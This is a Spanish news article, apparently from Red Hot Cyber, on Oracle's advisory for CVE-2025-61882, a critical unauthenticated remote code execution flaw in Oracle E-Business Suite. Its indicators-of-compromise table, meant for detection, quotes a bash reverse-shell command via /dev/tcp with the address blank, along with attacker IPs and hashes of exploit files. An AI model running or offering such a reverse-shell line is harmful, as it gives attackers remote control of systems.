
Redazione RHC : 5 octubre 2025 21:29
Oracle ha publicado un aviso de seguridad sobre una vulnerabilidad crítica identificada como CVE-2025-61882 en Oracle E-Business Suite . Esta falla puede explotarse remotamente sin autenticación , lo que podría permitir la ejecución de código malicioso en los sistemas afectados.
La compañía recomienda a sus clientes que apliquen de inmediato las actualizaciones descritas en el aviso. Oracle enfatiza la importancia de mantener las versiones de producto con soporte activo e instalar todos los parches de seguridad críticos con prontitud. En particular, la actualización de los parches críticos publicados en octubre de 2023 es un requisito previo para implementar nuevas correcciones.
Para respaldar la detección y contención inmediata de posibles ataques, la alerta incluye una matriz de riesgo con indicadores de compromiso , como direcciones IP sospechosas, comandos y archivos asociados con exploits conocidos.
La vulnerabilidad afecta específicamente a las versiones 12.2.3 a 12.2.14 de Oracle E-Business Suite . La documentación oficial, disponible a través de los enlaces proporcionados por Oracle, contiene información detallada sobre los parches y su instalación.
| productos y versiones afectados | Documento de disponibilidad de parches |
|---|---|
| Oracle E-Business Suite, versiones 12.2.3–12.2.14 | Suite de negocios electrónicos de Oracle |
Los parches proporcionados a través del programa de alerta de seguridad solo están disponibles para las versiones cubiertas por Soporte Premier o Soporte Extendido según la Política de Soporte de por Vida de Oracle.
Las versiones no incluidas en estos programas no se someten a pruebas para detectar las vulnerabilidades reportadas, aunque aún puedan verse afectadas. Por este motivo, Oracle recomienda actualizar a versiones compatibles para garantizar la protección y la compatibilidad con los parches de seguridad.
CVE-2025-61882 afecta a Oracle E-Business Suite y se puede explotar de forma remota sin autenticación, lo que podría provocar la ejecución remota de código si se explota con éxito.
Se ha publicado en GitHub un método de detección público que ayuda a identificar instancias potencialmente obsoletas. El método marca una instancia como sospechosa cuando la página devuelve la cadena «Página de inicio de E-Business Suite» y el encabezado HTTP » Última modificación » indica una fecha anterior al 4 de octubre de 2025 (marca de tiempo Unix 1759602752 ).
Este enfoque se describe como una herramienta de detección, no como un vector de ataque , y debe utilizarse únicamente con fines de verificación y defensa. Para mitigar el riesgo, Oracle recomienda aplicar los parches descritos en el aviso de seguridad y actualizar a las versiones compatibles.
A continuación se muestran indicadores de compromiso (direcciones IP, comandos observados y archivos) para respaldar la detección, investigación y contención inmediatas.
| Indicador | Tipo | Descripción |
|---|---|---|
| 200[.]107[.]207[.]26 | Propiedad intelectual | Actividad potencial GET y POST |
| 185[.]181[.]60[.]11 | Propiedad intelectual | Actividad potencial GET y POST |
| sh -c /bin/bash -i >& /dev/tcp//0>&1 | Dominio | Establecer una conexión TCP saliente en un puerto específico |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA 256 | oráculo_ebs_nday_exploit_poc_dispersos_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
Redazione
En los últimos días, algunos usuarios han recibido una notificación diciendo que sus dispositivos Gemini Advanced han sido «actualizados del modelo de la generación anterior al 3.0 Pro, el modelo...

La Agencia de Seguridad de Infraestructura y Ciberseguridad de Estados Unidos (CISA) ha emitido una alerta global con respecto a la explotación activa de una falla crítica de ejecución remota de c�...

El lunes 20 de octubre, el Canal 4 transmitió un documental completo presentado por un presentador de televisión creativo impulsado completamente por inteligencia artificial. » No soy real. Por pri...

El ecosistema ruso del cibercrimen ha entrado en una fase de profunda transformación, provocada por una combinación de factores: una presión internacional sin precedentes por parte de los organismo...

Investigadores de seguridad han descubierto vulnerabilidades en un sitio web de la FIA que contenía información personal confidencial y documentos relacionados con los pilotos, incluido el campeón ...